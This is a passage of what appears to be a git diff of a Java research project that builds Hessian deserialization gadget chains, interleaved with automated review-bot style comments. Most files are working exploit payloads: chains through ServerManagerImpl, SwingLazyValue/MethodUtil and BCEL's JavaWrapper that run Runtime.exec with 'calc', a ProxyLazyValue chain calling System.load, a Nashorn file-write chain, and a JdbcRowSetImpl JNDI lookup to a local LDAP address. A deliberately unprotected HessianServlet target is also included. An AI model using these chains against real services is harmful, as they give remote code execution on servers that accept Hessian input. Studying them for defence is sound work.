hashMap); + + JSONArray jsonArray = new JSONArray(); + jsonArray.add(serverManager); + + HashMap hashMap1 = new HashMap<>(); + HashMap hashMap2 = new HashMap<>(); + Object type = UnsafeTools.getObjectByUnsafe(AudioFileFormat.Type.class); + hashMap1.put("1", jsonArray); + hashMap1.put("2", type); + hashMap2.put("1", type); + hashMap2.put("2", jsonArray); + + HashMap finalMap = new HashMap<>(); + finalMap.put(hashMap1, "any"); + finalMap.put(hashMap2, "any"); + + return finalMap; + } +} 
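Review bot: The import `javafx.beans.property.IntegerProperty` is unused in AudioFileFormat2toString and ties compilation to a JavaFX-bearing JDK; remove it. The `ServerTableEntry`/`ServerManagerImpl`/`JSONArray` setup at the top of `getPayload` is repeated verbatim in `ConcurrentHashMap2equals.getPayload` and `XStringFSB2toString.getPayload`, so one helper in `tools` returning the `JSONArray` would keep the three classes down to the part that differs. The comment `// 键一定是Integer` states a constraint the type system can express: `HashMap<Integer, Object> hashMap = new HashMap<>();`.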
diff --git a/hessian/src/main/java/com/test/gadget/blackhat2025/ConcurrentHashMap2equals.java b/hessian/src/main/java/com/test/gadget/blackhat2025/ConcurrentHashMap2equals.java new file mode 100644 index 0000000..6a68d8a --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/blackhat2025/ConcurrentHashMap2equals.java 
@@ -0,0 +1,59 @@ +package com.test.gadget.blackhat2025; + +import com.alibaba.fastjson.JSONArray; +import com.sun.corba.se.impl.activation.ServerManagerImpl; +import com.sun.corba.se.impl.activation.ServerTableEntry; +import com.sun.deploy.nativesandbox.IntegrityProcess; +import com.sun.org.apache.xpath.internal.objects.XStringForFSB; +import tools.HessianTools; +import tools.ReflectTools; +import tools.UnsafeTools; + +import javax.sound.sampled.AudioFileFormat; +import java.util.HashMap; +import java.util.concurrent.ConcurrentHashMap; +import java.util.concurrent.ConcurrentMap; + +public class ConcurrentHashMap2equals { + public static void main(String[] args) throws Exception { + Object payload = getPayload(); + byte[] bytes = HessianTools.hessian2Ser2bytes(payload); + HessianTools.hessian2Deser(bytes); + } + + public static Object getPayload() throws Exception { + Object entry = UnsafeTools.getObjectByUnsafe(ServerTableEntry.class); + // process.exit不能报错;linux下使用UNIXProcess即可 + Object process = UnsafeTools.getObjectByUnsafe(IntegrityProcess.class); + ReflectTools.setFieldValue(entry, "state", 2); + ReflectTools.setFieldValue(entry, "process", process); + ReflectTools.setFieldValue(entry, "activationCmd", "calc"); + + HashMap hashMap = new HashMap<>(); + // 键一定是Integer + hashMap.put(1, entry); + + Object serverManager = UnsafeTools.getObjectByUnsafe(ServerManagerImpl.class); + ReflectTools.setFieldValue(serverManager, "serverTable", hashMap); + + JSONArray jsonArray = new JSONArray(); + jsonArray.add(serverManager); + + Object audio = UnsafeTools.getObjectByUnsafe(AudioFileFormat.Type.class); + +// Object xString = UnsafeTools.getObjectByUnsafe(XStringForFSB.class); +// ReflectTools.setFieldValue(xString, "m_strCache", "notNull1"); + + Class aClass = Class.forName("java.util.concurrent.ConcurrentHashMap$MapEntry"); + Object conHashMap1 = UnsafeTools.getObjectByUnsafe(aClass); + Object conHashMap2 = UnsafeTools.getObjectByUnsafe(aClass); + 
ReflectTools.setFieldValue(conHashMap1, "key", audio); + ReflectTools.setFieldValue(conHashMap1, "val", jsonArray); + ReflectTools.setFieldValue(conHashMap2, "key", jsonArray); + ReflectTools.setFieldValue(conHashMap2, "val", audio); + + ConcurrentHashMap finalMap = ReflectTools.makeConcurrentMap(conHashMap1, conHashMap2); + + return finalMap; + } +} diff --git a/hessian/src/main/java/com/test/gadget/blackhat2025/XStringFSB2toString.java b/hessian/src/main/java/com/test/gadget/blackhat2025/XStringFSB2toString.java new file mode 100644 index 0000000..a792e77 --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/blackhat2025/XStringFSB2toString.java 
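Review bot: `XStringForFSB` and `ConcurrentMap` are imported but unused in ConcurrentHashMap2equals — the only mention of `XStringForFSB` is the commented-out pair of lines before the `Class.forName("java.util.concurrent.ConcurrentHashMap$MapEntry")` call, and commented-out code should be deleted rather than committed. `Class aClass` and `ConcurrentHashMap finalMap` are raw types; `Class<?> aClass` at minimum. The duplicated payload setup is noted on AudioFileFormat2toString.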
@@ -0,0 +1,92 @@ +package com.test.gadget.blackhat2025; + +import com.alibaba.fastjson.JSONArray; +import com.sun.corba.se.impl.activation.ServerManagerImpl; +import com.sun.corba.se.impl.activation.ServerTableEntry; +import com.sun.deploy.nativesandbox.IntegrityProcess; +import com.sun.org.apache.xpath.internal.objects.XStringForFSB; +import tools.HessianTools; +import tools.ReflectTools; +import tools.UnsafeTools; + +import java.util.AbstractMap; +import java.util.HashMap; + +public class XStringFSB2toString { + public static void main(String[] args) throws Exception { + Object payload = getPayload(); + byte[] bytes = HessianTools.hessian2Ser2bytes(payload); + HessianTools.hessian2Deser(bytes); + } + + public static Object getPayload() throws Exception { + Object entry = UnsafeTools.getObjectByUnsafe(ServerTableEntry.class); + // process.exit不能报错;linux下使用UNIXProcess即可 + Object process = UnsafeTools.getObjectByUnsafe(IntegrityProcess.class); + ReflectTools.setFieldValue(entry, "state", 2); + ReflectTools.setFieldValue(entry, "process", process); + ReflectTools.setFieldValue(entry, "activationCmd", "calc"); + + HashMap hashMap = new HashMap<>(); + // 键一定是Integer + hashMap.put(1, entry); + + Object serverManager = UnsafeTools.getObjectByUnsafe(ServerManagerImpl.class); + ReflectTools.setFieldValue(serverManager, "serverTable", hashMap); + + JSONArray jsonArray = new JSONArray(); + jsonArray.add(serverManager); + + Object xString = UnsafeTools.getObjectByUnsafe(XStringForFSB.class); +// String unhash = unhash(jsonArray.hashCode()); + ReflectTools.setFieldValue(xString, "m_strCache", "notNull1"); + + // 不知道为什么要包一层 +// Object simple = UnsafeTools.getObjectByUnsafe(AbstractMap.SimpleEntry.class); + // 这里的key 是 final private,但是竟然能直接赋值成功 +// ReflectTools.setFieldValue(simple, "key", jsonArray); + + HashMap hashMap1 = new HashMap<>(); + HashMap hashMap2 = new HashMap<>(); + // 键值不能改,确保hashCode碰撞,才能进入equals + hashMap1.put("zZ", xString); + hashMap1.put("yy", jsonArray); + 
hashMap2.put("yy", xString); + hashMap2.put("zZ", jsonArray); + + HashMap finalMap = ReflectTools.makeMap(hashMap1, hashMap2); + + return finalMap; + } + + public static String unhash ( int hash ) { + int target = hash; + StringBuilder answer = new StringBuilder(); + if ( target < 0 ) { + // String with hash of Integer.MIN_VALUE, 0x80000000 + answer.append("\u0915\u0009\u001e\u000c\u0002"); + + if ( target == Integer.MIN_VALUE ) + return answer.toString(); + // Find target without sign bit set + target = target & Integer.MAX_VALUE; + } + + unhash0(answer, target); + return answer.toString(); + } + private static void unhash0 ( StringBuilder partial, int target ) { + int div = target / 31; + int rem = target % 31; + + if ( div <= Character.MAX_VALUE ) { + if ( div != 0 ) + partial.append((char) div); + partial.append((char) rem); + } + else { + unhash0(partial, div); + partial.append((char) rem); + } + } +} diff --git a/hessian/src/main/java/com/test/gadget/c3p0.java b/hessian/src/main/java/com/test/gadget/c3p0.java new file mode 100644 index 0000000..6042d8f --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/c3p0.java @@ -0,0 +1,4 @@ +package com.test.gadget; + +public class c3p0 { +} diff --git a/hessian/src/main/java/com/test/gadget/tmp.java b/hessian/src/main/java/com/test/gadget/tmp.java new file mode 100644 index 0000000..d37b3af --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/tmp.java 
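Review bot: `unhash` and `unhash0` are dead code in XStringFSB2toString — the only call site is the commented-out `// String unhash = unhash(jsonArray.hashCode());` — and the `AbstractMap` import is likewise referenced only from commented-out lines; either delete the helpers, the import and the dead comments, or restore the call that uses them. If `unhash` stays, it is public and undocumented; a Javadoc such as `/** Returns a String whose hashCode() equals {@code hash}; the base-31 digits are produced by unhash0. */` states the contract. The spacing style `unhash ( int hash )` and `if ( target < 0 )` differs from the rest of the file; run the formatter.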
@@ -0,0 +1,156 @@ +package com.test.gadget; + +import com.alibaba.fastjson.JSONObject; +import com.caucho.hessian.io.Hessian2Input; +import com.caucho.hessian.io.Hessian2Output; +import com.caucho.hessian.io.SerializerFactory; +import com.sun.corba.se.impl.activation.ServerManagerImpl; +import com.sun.corba.se.impl.activation.ServerTableEntry; + +import com.sun.org.apache.xpath.internal.objects.XStringForFSB; +import sun.reflect.ReflectionFactory; + +import java.io.*; +import java.lang.reflect.*; +import java.util.HashMap; +import java.util.Random; +import java.util.concurrent.ConcurrentHashMap; + +import static com.sun.org.apache.xalan.internal.xsltc.compiler.Constants.CHARACTERS; + +public class tmp { + public static void main(String[] args) throws Exception { + ServerManagerImpl serverManager = createWithObjectNoArgsConstructor(ServerManagerImpl.class); + HashMap map =new HashMap<>(); + ServerTableEntry serverTableEntry = createWithObjectNoArgsConstructor(ServerTableEntry.class); + map.put(1,serverTableEntry); + + Process process = new ProcessBuilder("cmd", "/c", "calc").start(); + + setFieldValue(serverManager, "serverTable", map); + setFieldValue(serverTableEntry,"state",2); + setFieldValue(serverTableEntry, "process", process); + setFieldValue(serverTableEntry, "activationCmd", "calc"); + + JSONObject jsonObject = new JSONObject(); + jsonObject.put("key", serverManager); + + +// XStringForFSB xStringForFSB = createWithoutConstructor(XStringForFSB.class); +// setFieldValue(xStringForFSB, "m_strCache", generateRandomString()); + Object conEntry = createWithObjectNoArgsConstructor(Class.forName("javax.sound.sampled.AudioFileFormat$Type")); + + + Object conEntry1 = createWithObjectNoArgsConstructor(Class.forName("java.util.concurrent.ConcurrentHashMap$MapEntry")); + Object conEntry2 = createWithObjectNoArgsConstructor(Class.forName("java.util.concurrent.ConcurrentHashMap$MapEntry")); + setFieldValue(conEntry1, "key", conEntry); + setFieldValue(conEntry1, "val", 
jsonObject); + setFieldValue(conEntry2, "key", jsonObject); + setFieldValue(conEntry2, "val", conEntry); + ConcurrentHashMap s = new ConcurrentHashMap(); + setFieldValue(s, "sizeCtl", 2); + Class nodeC; + try { + nodeC = Class.forName("java.util.concurrent.ConcurrentHashMap$Node"); + } + catch ( ClassNotFoundException e ) { + nodeC = Class.forName("java.util.concurrent.ConcurrentHashMap$Entry"); + } + Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC); + setAccessible(nodeCons); + Object tbl = Array.newInstance(nodeC, 2); + Array.set(tbl, 0, nodeCons.newInstance(0, conEntry1, conEntry1, null)); + Array.set(tbl, 1, nodeCons.newInstance(0, conEntry2, conEntry2, null)); + setFieldValue(s, "table", tbl); + Field table = ConcurrentHashMap.class.getDeclaredField("table"); + table.setAccessible(true); + table.set(s, tbl); + + ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); + Hessian2Output out = new Hessian2Output(byteArrayOutputStream); + + SerializerFactory sf = new SerializerFactory(); + sf.setAllowNonSerializable(true); + out.setSerializerFactory(sf); + out.writeObject(s); + out.flush(); + ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(byteArrayOutputStream.toByteArray()); + new Hessian2Input(byteArrayInputStream).readObject(); + } + + public static void Serialize(Object obj) throws IOException { + ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("ser.bin")); + objectOutputStream.writeObject(obj); + + } + + public static Object Unserialize(String Filename) throws IOException,ClassNotFoundException{ + + ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(Filename)); + Object obj = objectInputStream.readObject(); + return obj; + + } + public static String generateRandomString() { + Random random = new Random(); + int length = random.nextInt(20)+1; + StringBuilder sb = new StringBuilder(length); + + for (int i = 0; 
i < length; i++) { + int index = random.nextInt(CHARACTERS.length()); + char randomChar = CHARACTERS.charAt(index); + sb.append(randomChar); + } + + return sb.toString(); + } + public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception { + final Field field = getField(obj.getClass(), fieldName); + field.set(obj, value); + } + public static T createWithoutConstructor ( Class classToInstantiate ) + throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException { + return createWithConstructor(classToInstantiate, Object.class, new Class[0], new Object[0]); + } + public static T createWithObjectNoArgsConstructor(Class clzToInstantiate) { + + T resObject = null; + try{ + resObject = createWithConstructor(clzToInstantiate, Object.class, new Class[0], new Object[0]); + } catch (NoSuchMethodException | InstantiationException | IllegalAccessException | InvocationTargetException e) { + } + + return resObject; + } + public static T createWithConstructor ( Class classToInstantiate, Class constructorClass, Class[] consArgTypes, Object[] consArgs ) + throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException { + Constructor objCons = constructorClass.getDeclaredConstructor(consArgTypes); + setAccessible(objCons); + Constructor sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons); + setAccessible(sc); + return (T)sc.newInstance(consArgs); + } + public static Field getField(final Class clazz, final String fieldName) { + Field field = null; + try { + field = clazz.getDeclaredField(fieldName); + setAccessible(field); + } + catch (NoSuchFieldException ex) { + if (clazz.getSuperclass() != null) + field = getField(clazz.getSuperclass(), fieldName); + } + return field; + } + public static void setAccessible(AccessibleObject member) { + String versionStr = System.getProperty("java.version"); + int 
javaVersion = Integer.parseInt(versionStr.split("\\.")[0]); + + // not possible to quiet runtime warnings anymore... + // see https://bugs.openjdk.java.net/browse/JDK-8210522 + // to understand impact on Permit (i.e. it does not work + // anymore with Java >= 12) + member.setAccessible(true); + } +} + diff --git a/hessian/src/main/java/com/test/gadget/tmp1.java b/hessian/src/main/java/com/test/gadget/tmp1.java new file mode 100644 index 0000000..a905790 --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/tmp1.java @@ -0,0 +1,27 @@ +package com.test.gadget; + +import com.sun.rowset.JdbcRowSetImpl; +import com.sun.syndication.feed.impl.EqualsBean; +import tools.ReflectTools; + +import java.util.HashMap; + +public class tmp1 { + public static void main(String[] args) throws Exception { + JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl(); + jdbcRowSet.setDataSourceName("ldap://127.0.0.1:50389/2d4ade"); + EqualsBean equalsBean = new EqualsBean(JdbcRowSetImpl.class, jdbcRowSet); + + HashMap hashMap1 = new HashMap<>(); + HashMap hashMap2 = new HashMap<>(); + hashMap1.put("zZ", equalsBean); + hashMap1.put("yy", jdbcRowSet); + hashMap2.put("zZ", jdbcRowSet); + hashMap2.put("yy", equalsBean); + + HashMap finalMap = ReflectTools.makeMap(hashMap2, hashMap1); + + byte[] bytes = ReflectTools.ser2bytes(finalMap); + ReflectTools.deser(bytes, null); + } +} diff --git a/hessian/src/main/java/com/test/gadget/toStringBased/BCELClass.java b/hessian/src/main/java/com/test/gadget/toStringBased/BCELClass.java new file mode 100644 index 0000000..ad4a5a8 --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/toStringBased/BCELClass.java @@ -0,0 +1,10 @@ +package com.test.gadget.toStringBased; + +import java.io.IOException; + +public class BCELClass { + public static void _main(String[] args) throws IOException { + System.out.println("evil _main"); + Runtime.getRuntime().exec(new String[]{"cmd.exe", "/c", "calc"}); + } +} 
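Review bot: `Serialize` and `Unserialize` in tmp.java never close their streams — `Serialize` in particular neither flushes nor closes the `ObjectOutputStream`, so buffered block data can be missing from `ser.bin`; both should use try-with-resources (below). `createWithObjectNoArgsConstructor` swallows `NoSuchMethodException | InstantiationException | IllegalAccessException | InvocationTargetException` with an empty catch and returns `null`, turning a failed instantiation into a later `NullPointerException` inside `setFieldValue`; rethrow, or at least name the variable `ignored` with a comment if the null return is intended. In `setAccessible` the computed `javaVersion` is never read, and `main` writes the `table` field twice (`setFieldValue(s, "table", tbl)` followed by the direct `Field` write). `main` also starts a process with `new ProcessBuilder("cmd", "/c", "calc").start()` while building the object graph, independent of any deserialization, so as written it does not demonstrate the chain it is meant to test.
```java
public static void Serialize(Object obj) throws IOException {
    try (ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("ser.bin"))) {
        objectOutputStream.writeObject(obj);
    }
}

public static Object Unserialize(String Filename) throws IOException, ClassNotFoundException {
    try (ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(Filename))) {
        return objectInputStream.readObject();
    }
}
```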
diff --git a/hessian/src/main/java/com/test/gadget/toStringBased/HashTableEquals_get.java b/hessian/src/main/java/com/test/gadget/toStringBased/HashTableEquals_get.java new file mode 100644 index 0000000..17436b0 --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/toStringBased/HashTableEquals_get.java @@ -0,0 +1,37 @@ +package com.test.gadget.toStringBased; + +import sun.swing.SwingLazyValue; +import tools.HessianTools; +import tools.ReflectTools; + +import javax.swing.*; +import java.lang.reflect.Method; +import java.rmi.server.UID; +import java.util.HashMap; + +public class HashTableEquals_get { + public static void main(String[] args) throws Exception { + Object payload = getPayload(); + byte[] bytes = HessianTools.hessian2Ser2bytes(payload); + HessianTools.hessian2Deser(bytes); + } + + public static Object getPayload() throws Exception { + Method exec = Runtime.class.getDeclaredMethod("exec", String[].class); + Method invokeMethod = Class.forName("sun.reflect.misc.MethodUtil").getDeclaredMethod("invoke", Method.class, Object.class, Object[].class); + // 不能直接传入Runtime,会找不到方法,因为要求参数类型为Object + // hessian>=60最终不能调Runtime,因为反序列化后Runtime变成HashMap了 + SwingLazyValue swingLazyValue = new SwingLazyValue("sun.reflect.misc.MethodUtil", "invoke", + new Object[]{invokeMethod, new Object(), new Object[]{exec, Runtime.getRuntime(), new Object[]{new String[]{"cmd.exe","/c","calc"}}}}); + + UIDefaults uiDefaults = new UIDefaults(); + uiDefaults.put("1diot9", swingLazyValue); + + UIDefaults uiDefaults1 = new UIDefaults(); + uiDefaults1.put("1diot9", swingLazyValue); + + HashMap hashMap = ReflectTools.makeMap(uiDefaults, uiDefaults1); + + return hashMap; + } +} diff --git a/hessian/src/main/java/com/test/gadget/toStringBased/MimeTypeParameterList_MethodUtil.java b/hessian/src/main/java/com/test/gadget/toStringBased/MimeTypeParameterList_MethodUtil.java new file mode 100644 index 0000000..0702e2d --- /dev/null 
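Review bot: `java.rmi.server.UID` is imported but unused in HashTableEquals_get. The `SwingLazyValue` construction with its two `Method` lookups and two-line Chinese comment is repeated verbatim in `MimeTypeParameterList_MethodUtil.getPayload` (next hunk); moving it into one shared helper keeps the two classes from drifting. `uiDefaults` and `uiDefaults1` are built with identical content, which is presumably deliberate so that the two maps compare equal; a one-line comment, `// two equal UIDefaults instances (same key and value)`, saves the next reader the question.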
+++ b/hessian/src/main/java/com/test/gadget/toStringBased/MimeTypeParameterList_MethodUtil.java @@ -0,0 +1,36 @@ +package com.test.gadget.toStringBased; + +import sun.swing.SwingLazyValue; +import tools.HessianTools; +import tools.ReflectTools; + +import javax.activation.MimeTypeParameterList; +import javax.swing.*; +import java.io.IOException; +import java.lang.reflect.Method; + +public class MimeTypeParameterList_MethodUtil { + public static void main(String[] args) throws NoSuchMethodException, IllegalAccessException, IOException, ClassNotFoundException { + Object payload = getPayload(); + byte[] bytes = HessianTools.hessian2ToStringSer(payload); + HessianTools.hessian2Deser(bytes); + } + + + public static Object getPayload() throws NoSuchMethodException, IllegalAccessException, ClassNotFoundException { + Method exec = Runtime.class.getDeclaredMethod("exec", String[].class); + Method invokeMethod = Class.forName("sun.reflect.misc.MethodUtil").getDeclaredMethod("invoke", Method.class, Object.class, Object[].class); + // 不能直接传入Runtime,会找不到方法,因为要求参数类型为Object + // hessian>=60最终不能调Runtime,因为反序列化后Runtime变成HashMap了 + SwingLazyValue swingLazyValue = new SwingLazyValue("sun.reflect.misc.MethodUtil", "invoke", + new Object[]{invokeMethod, new Object(), new Object[]{exec, Runtime.getRuntime(), new Object[]{new String[]{"cmd.exe","/c","calc"}}}}); + + UIDefaults uiDefaults = new UIDefaults(); + uiDefaults.put("1diot9", swingLazyValue); + + MimeTypeParameterList mimeTypeParameterList = new MimeTypeParameterList(); + ReflectTools.setFieldValue(mimeTypeParameterList, "parameters", uiDefaults); + + return mimeTypeParameterList; + } +} diff --git a/hessian/src/main/java/com/test/gadget/toStringBased/MimeTypeParameterList_ProxyLazyValue_Sysload.java b/hessian/src/main/java/com/test/gadget/toStringBased/MimeTypeParameterList_ProxyLazyValue_Sysload.java new file mode 100644 index 0000000..16be253 --- /dev/null 
+++ b/hessian/src/main/java/com/test/gadget/toStringBased/MimeTypeParameterList_ProxyLazyValue_Sysload.java 
@@ -0,0 +1,57 @@ +package com.test.gadget.toStringBased; + +import jdk.nashorn.internal.runtime.ScriptEnvironment; +import jdk.nashorn.internal.runtime.logging.DebugLogger; +import tools.HessianTools; +import tools.IOTools; +import tools.ReflectTools; +import tools.UnsafeTools; + +import javax.activation.MimeTypeParameterList; +import javax.swing.*; + +public class MimeTypeParameterList_ProxyLazyValue_Sysload { + public static void main(String[] args) throws Exception { +// Object payload = writeFilePayload(); +// byte[] bytes = HessianTools.hessian2ToStringSer(payload); +// HessianTools.hessian2Deser(bytes); + + Object o = sysLoadPayload(); + byte[] bytes1 = HessianTools.hessian2ToStringSer(o); + HessianTools.hessian2Deser(bytes1); + } + + public static Object writeFilePayload() throws Exception { + Object scriptenv = UnsafeTools.getObjectByUnsafe(ScriptEnvironment.class); + ReflectTools.setFieldValue(scriptenv, "_print_code", false); + ReflectTools.setFieldValue(scriptenv, "_dest_dir", "D:/"); + + Object debug = UnsafeTools.getObjectByUnsafe(DebugLogger.class); + byte[] bytes = IOTools.readFile("D:/1tmp/gcc/dynamic.dll"); + + UIDefaults.ProxyLazyValue proxyLazyValue = new UIDefaults.ProxyLazyValue("jdk.nashorn.internal.codegen.DumpBytecode", "dumpBytecode", new Object[]{scriptenv, debug, bytes, "test"}); + ReflectTools.setFieldValue(proxyLazyValue, "acc", null); + + UIDefaults uiDefaults = new UIDefaults(); + uiDefaults.put("1diot9", proxyLazyValue); + + MimeTypeParameterList mimeTypeParameterList = new MimeTypeParameterList(); + ReflectTools.setFieldValue(mimeTypeParameterList, "parameters", uiDefaults); + + return mimeTypeParameterList; + } + + public static Object sysLoadPayload() throws Exception { + + UIDefaults.ProxyLazyValue proxyLazyValue = new UIDefaults.ProxyLazyValue("java.lang.System", "load", new Object[]{"D:/test.class"}); + ReflectTools.setFieldValue(proxyLazyValue, "acc", null); + + UIDefaults uiDefaults = new UIDefaults(); + 
uiDefaults.put("1diot9", proxyLazyValue); + + MimeTypeParameterList mimeTypeParameterList = new MimeTypeParameterList(); + ReflectTools.setFieldValue(mimeTypeParameterList, "parameters", uiDefaults); + + return mimeTypeParameterList; + } +} diff --git a/hessian/src/main/java/com/test/gadget/toStringBased/PKCS9_BCEL.java b/hessian/src/main/java/com/test/gadget/toStringBased/PKCS9_BCEL.java new file mode 100644 index 0000000..726abfd --- /dev/null +++ b/hessian/src/main/java/com/test/gadget/toStringBased/PKCS9_BCEL.java @@ -0,0 +1,38 @@ +package com.test.gadget.toStringBased; + +import com.sun.org.apache.bcel.internal.Repository; +import com.sun.org.apache.bcel.internal.classfile.JavaClass; +import com.sun.org.apache.bcel.internal.classfile.Utility; +import com.sun.org.apache.bcel.internal.util.ClassPath; +import sun.security.pkcs.PKCS9Attribute; +import sun.security.pkcs.PKCS9Attributes; +import sun.swing.SwingLazyValue; +import tools.HessianTools; +import tools.ReflectTools; +import tools.UnsafeTools; + +import javax.swing.*; +import java.io.IOException; + +public class PKCS9_BCEL { + public static void main(String[] args) throws Exception { + Object payload = getPayload(); + byte[] bytes = HessianTools.hessian2ToStringSer(payload); + HessianTools.hessian2Deser(bytes); + } + + public static Object getPayload() throws Exception { + JavaClass javaClass = Repository.lookupClass(BCELClass.class); + String bcel = "$$BCEL$$" + Utility.encode(javaClass.getBytes(), true); + + SwingLazyValue swingLazyValue = new SwingLazyValue("com.sun.org.apache.bcel.internal.util.JavaWrapper", "_main", new Object[]{new String[]{bcel}}); + + UIDefaults uiDefaults = new UIDefaults(); + uiDefaults.put(PKCS9Attribute.EMAIL_ADDRESS_OID, swingLazyValue); + + Object PKCS9s = UnsafeTools.getObjectByUnsafe(PKCS9Attributes.class); + ReflectTools.setFieldValue(PKCS9s, "attributes", uiDefaults); + + return PKCS9s; + } +} 
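Review bot: `main` in MimeTypeParameterList_ProxyLazyValue_Sysload carries three commented-out lines for `writeFilePayload`, leaving that public method with no caller; delete the dead invocation or keep one entry point per payload. `writeFilePayload` and `sysLoadPayload` both end with the same `ProxyLazyValue` → `UIDefaults` → `MimeTypeParameterList` wrapping (also repeated in MimeTypeParameterList_MethodUtil); a private `wrap(UIDefaults.ProxyLazyValue)` helper would remove the triplication. `ReflectTools.setFieldValue(proxyLazyValue, "acc", null)` appears in both methods without a comment saying why the field must be cleared; state it once in the helper.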
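Review bot: `ClassPath` and `java.io.IOException` are imported but unused in PKCS9_BCEL; remove them. The local `PKCS9s` breaks the lowerCamelCase used elsewhere in the file (`pkcs9Attributes`), and `getPayload` has no Javadoc.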
diff --git a/hessian/src/main/java/com/test/pojo/Person.java b/hessian/src/main/java/com/test/pojo/Person.java
new file mode 100644
index 0000000..1f1a6e8
--- /dev/null
+++ b/hessian/src/main/java/com/test/pojo/Person.java
@@ -0,0 +1,29 @@
+package com.test.pojo;
+
+import java.io.Serializable;
+
+public class Person implements Serializable {
+ private int id;
+ private String name;
+
+ public Person(int id, String name) {
+ this.id = id;
+ this.name = name;
+ }
+
+ public int getId() {
+ return id;
+ }
+
+ public void setId(int id) {
+ this.id = id;
+ }
+
+ public String getName() {
+ return name;
+ }
+
+ public void setName(String name) {
+ this.name = name;
+ }
+}
diff --git a/hessian/src/main/java/com/test/server/HessianServiceImpl.java b/hessian/src/main/java/com/test/server/HessianServiceImpl.java
new file mode 100644
index 0000000..b439ee7
--- /dev/null
+++ b/hessian/src/main/java/com/test/server/HessianServiceImpl.java
@@ -0,0 +1,13 @@
+package com.test.server;
+
+import com.caucho.hessian.server.HessianServlet;
+
+import javax.servlet.annotation.WebServlet;
+
+@WebServlet(name = "hessian", value = "/hessian")
+public class HessianServiceImpl extends HessianServlet implements Service {
+ @Override
+ public String getCurrentTime() {
+ return "test time: 1970/01/01";
+ }
+}
diff --git a/hessian/src/main/java/com/test/server/Service.java b/hessian/src/main/java/com/test/server/Service.java
new file mode 100644
index 0000000..59934b9
--- /dev/null
+++ b/hessian/src/main/java/com/test/server/Service.java
@@ -0,0 +1,5 @@
+package com.test.server;
+
+public interface Service {
+ public String getCurrentTime();
+}
diff --git a/hessian/src/main/java/tools/ClassByteGen.java b/hessian/src/main/java/tools/ClassByteGen.java
new file mode 100644
index 0000000..0a0f32a
--- /dev/null
+++ b/hessian/src/main/java/tools/ClassByteGen.java
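Review bot: `Person` implements `Serializable` but declares no `serialVersionUID`, so the JVM derives one from the class shape and any later change to the fields or accessors breaks compatibility with already-serialized instances; add `private static final long serialVersionUID = 1L;`. A one-line Javadoc marking the class as a test fixture for the Hessian service would also help, since nothing else in the hunk says what it is for.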
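Review bot: `HessianServiceImpl` publishes `/hessian` through `HessianServlet` with the default `SerializerFactory` — no class allow-list is configured anywhere in the hunk — and nothing in the class says that this is deliberate; a class comment should state it, e.g. `// Lab target: default SerializerFactory with no ClassFactory allow-list; never deploy outside the test environment.` `getCurrentTime` returns the fixed string `"test time: 1970/01/01"` rather than the current time; either rename it or mark it as a stub (`// stub: fixed value so responses are deterministic`). In `Service`, the `public` modifier on the interface method is redundant.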
@@ -0,0 +1,29 @@
+package tools;
+
+import javassist.ClassPool;
+import javassist.CtClass;
+import javassist.CtConstructor;
+
+public class ClassByteGen {
+ public static byte[] getBytes(String code, String className) throws Exception {
+ String Abstract = "com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet";
+ ClassPool pool = ClassPool.getDefault();
+ pool.importPackage(Abstract);
+ pool.importPackage("java.io");
+ pool.importPackage("java.nio.file");
+ pool.importPackage("java.lang.reflect");
+ pool.importPackage("java.nio.charset");
+ pool.importPackage("java.util");
+ pool.insertClassPath(Abstract);
+// pool.insertClassPath("java.nio");
+ CtClass ctClass = pool.makeClass(className);
+ ctClass.setSuperclass(pool.get(Abstract));
+// CtConstructor ctConstructor = ctClass.makeClassInitializer();
+// ctConstructor.setBody(code);
+ CtConstructor ctConstructor1 = new CtConstructor(new CtClass[]{}, ctClass);
+ ctConstructor1.setBody(code);
+ ctClass.addConstructor(ctConstructor1);
+ ctClass.writeFile("ClassByteGen");
+ return ctClass.toBytecode();
+ }
+}
diff --git a/hessian/src/main/java/tools/HessianTools.java b/hessian/src/main/java/tools/HessianTools.java
new file mode 100644
index 0000000..2875d1c
--- /dev/null
+++ b/hessian/src/main/java/tools/HessianTools.java
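Review bot: `getBytes` unconditionally calls `ctClass.writeFile("ClassByteGen")`, so what its name and `byte[]` return type present as a pure bytecode generator also drops a `.class` file into the working directory on every call; remove the call or make it opt-in and document it. The class is created on the shared `ClassPool.getDefault()` and never `detach()`ed after `toBytecode()` (which freezes it), so a second call with the same `className` may fail on the frozen class — `ctClass.detach();` after taking the bytes would avoid that, though I cannot confirm the javassist behaviour from the hunk alone. `pool.importPackage(Abstract)` and `pool.insertClassPath(Abstract)` are both passed a class name where a package name or path is expected, which deserves a comment on why it works here. The commented-out `makeClassInitializer` lines and `insertClassPath("java.nio")` should be deleted, and the local `Abstract` should be `abstractTranslet` per naming convention.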
@@ -0,0 +1,66 @@
+package tools;
+
+import com.caucho.hessian.io.*;
+
+import java.io.ByteArrayInputStream;
+import java.io.ByteArrayOutputStream;
+import java.io.IOException;
+
+public class HessianTools {
+ public static byte[] hessian2ToStringSer(Object obj) throws IOException {
+ ByteArrayOutputStream baos = new ByteArrayOutputStream();
+ baos.write(67);
+ Hessian2Output hessian2Output = new Hessian2Output(baos);
+
+ SerializerFactory serializerFactory = new SerializerFactory();
+ serializerFactory.setAllowNonSerializable(true);
+ hessian2Output.setSerializerFactory(serializerFactory);
+
+ hessian2Output.writeObject(obj);
+ hessian2Output.close();
+ return baos.toByteArray();
+ }
+
+
